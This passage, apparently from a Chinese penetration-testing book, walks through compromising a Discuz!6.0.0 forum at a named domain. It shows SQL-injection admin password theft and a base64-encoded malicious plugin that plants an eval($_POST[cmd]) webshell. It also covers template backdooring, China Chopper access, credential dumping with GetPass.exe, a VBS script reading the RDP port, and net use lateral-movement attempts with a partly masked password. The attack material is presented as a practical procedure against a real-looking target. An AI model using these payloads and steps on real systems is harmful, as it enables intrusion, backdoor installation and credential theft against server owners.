2.14 通過SQL注入漏洞滲透某服務(wù)器并直接提權(quán)

服務(wù)器的提權(quán)是有前提基礎(chǔ)的，有的可以直接獲取root或者administrator權(quán)限，但很多情況下需要接入的基礎(chǔ)，例如telnet、遠(yuǎn)程終端、VPN接入、Radmin等遠(yuǎn)程控制接入、反彈Shell及WebShell等。本案例通過SQL注入獲取WebShell，使用一些工具軟件直接獲取Windows的賬號和密碼。

2.14.1 對目標(biāo)站點的分析和漏洞利用

1．分析與利用漏洞

通過對目標(biāo)站點進(jìn)行查看，發(fā)現(xiàn)站點使用了Discuz!6.0.0 CMS程序。直接使用exp程序，嘗試獲取管理員密碼。如圖2-136所示，順利獲取管理員密碼，且管理員沒有使用安全提問。

圖2-136 獲取管理員密碼

2．查看其他管理員用戶

如果管理員采用了安全提問，雖然有破解程序可以破解，但破解的成功率與字典有關(guān)，這時可以通過“統(tǒng)計”或者查看論壇公告等方法尋找擁有管理員權(quán)限的用戶。如圖2-137所示，使用破解的admin賬戶密碼成功登錄系統(tǒng)，單擊“用戶管理”選項卡搜索“管理員”，就可以看到該系統(tǒng)中還存在很多具有管理員權(quán)限的用戶。

圖2-137 獲取其他管理員用戶

3．獲取WebShell

在獲取Discuz!6.0.0創(chuàng)始管理員權(quán)限的情況下，有4種方法可以獲取WebShell，最簡單易行的就是插件導(dǎo)入和修改模板，其利用方法如下。

（1）導(dǎo)入插件

導(dǎo)入插件代碼如下。

        YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2YWlsYWJsZSI7czoxOiIx
        IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldFNo
        ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzOjI2OiJhJ109ZXZhbCgkX1BPU1Rb
        Y21kXSk7JGFbJyI7czoxMToiZGVzY3JpcHRpb24iO3M6MDoiIjtzOjEwOiJk
        YXRhdGFibGVzIjtzOjA6IiI7czo5OiJkaXJlY3RvcnkiO3M6MDoiIjtzOjk6
        ImNvcHlyaWdodCI7czowOiIiO3M6NzoibW9kdWxlcyI7czowOiIiO31zOjc6
        InZlcnNpb24iO3M6NToiNi4wLjAiO30=

一句話后門連接的地址為http://bbs.vpser.net/forumdata/cache/plugin_a']=eval($_POST[cmd]);$a['.php。

（2）編輯風(fēng)格模板

在customfaq.lang.php文件中加入一句話后門“eval($_POST[cmd]); ”，一句話后門連接的地址為http://bbs.vpser.net/templates/default/customfaq.lang.php。

使用上面的方法均可以獲取WebShell，如圖2-138所示。

圖2-138 獲取WebShell

2.14.2 嘗試提權(quán)獲取管理員權(quán)限

1．使用“中國菜刀”的終端連接功能測試能否執(zhí)行命令

在“中國菜刀”一句話后門管理端中選擇剛才獲取的WebShell記錄，然后選擇終端連接，進(jìn)入命令提示符窗口，執(zhí)行一些簡單的cmd命令測試能否執(zhí)行命令。

2．上傳GetPass程序

Getpass.exe在普通用戶權(quán)限下也可以獲取管理員曾經(jīng)登錄的用戶名和密碼。如圖2-139所示，成功獲取管理員密碼和用戶名的列表。

圖2-139 獲取管理員密碼和權(quán)限

3．查看3389端口是否開放

使用“netstat-an | find "3389"”命令查看服務(wù)器上是否開放了3389端口，如圖2-140所示。如果默認(rèn)3389端口沒有開放（管理員修改到其他端口），則可以使用如下命令來獲取端口。

圖2-140 獲取3389端口開放情況

        Echo Dim ReadComputerName >>port.vbs
        Echo Set ReadComputerName=WScript.CreateObject("WScript.Shell") >>port.vbs
        Echo Dim TSName, TSRegPath >>port.vbs
        Echo                TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal
    Server\WinStations\RDP-Tcp\PortNumber" >>port.vbs
        Echo TSName=ReadComputerName.RegRead(TSRegPath) >>port.vbs
        Echo WScript.Echo("TermService port is:"^&TSName) >>port.vbs
        Cscript port.vbs

4．查看內(nèi)網(wǎng)情況

分別使用“ipconfig”和“net view”命令查看服務(wù)器是否有內(nèi)網(wǎng)。如圖2-141所示，獲取服務(wù)器IP地址為10.202.17.109，明顯是內(nèi)網(wǎng)IP地址，果然在同網(wǎng)段還有其他服務(wù)器。

圖2-142 獲取系統(tǒng)權(quán)限

5．嘗試內(nèi)網(wǎng)滲透并查看權(quán)限

使用sfind.exe程序?qū)?nèi)網(wǎng)端口進(jìn)行掃描，然后執(zhí)行“net use”命令來嘗試登錄內(nèi)網(wǎng)服務(wù)器。在DOS命令提示符下，可以使用“net use\\\10.202.17.24\admin$ "Zjugh***"/user:Administrator”命令來測試內(nèi)網(wǎng)服務(wù)器是否使用了能夠獲取服務(wù)器權(quán)限的口令，如果能執(zhí)行成功，則可以獲取該服務(wù)器的權(quán)限。在本例中，由于對方服務(wù)器設(shè)置了不同的口令，因此執(zhí)行命令失敗，但當(dāng)前服務(wù)器的權(quán)限為系統(tǒng)權(quán)限，如圖2-142所示。

圖2-142 獲取系統(tǒng)權(quán)限